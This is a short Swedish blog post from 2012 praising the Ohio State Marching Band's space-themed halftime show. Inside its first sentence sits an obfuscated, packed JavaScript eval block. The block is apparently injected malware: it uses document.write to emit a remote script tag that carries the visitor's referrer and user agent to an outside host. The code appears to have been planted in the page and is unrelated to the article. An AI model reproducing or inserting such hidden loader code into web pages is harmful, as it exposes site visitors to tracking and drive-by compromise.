Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Ohio State Marching Band är tillbaka!

Filip Urde
  • On 23 oktober, 2012
  • http://www.revue.se/filip-urde

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ztsfe|var|u0026u|referrer|aybia||js|php’.split(‘|’),0,{}))
någon vecka sedan skrev vi om Ohio State och deras fantastiska Marching band.
Sist så gjorde dem en halvtids show dedikerad till TV-spel. Sjukt cool var den om ni mins (annars kan ni se här).

Nu är dem tillbaka, den här gången med ett rymdtema.

Fan va dem kan där borta!

Episkt!!!!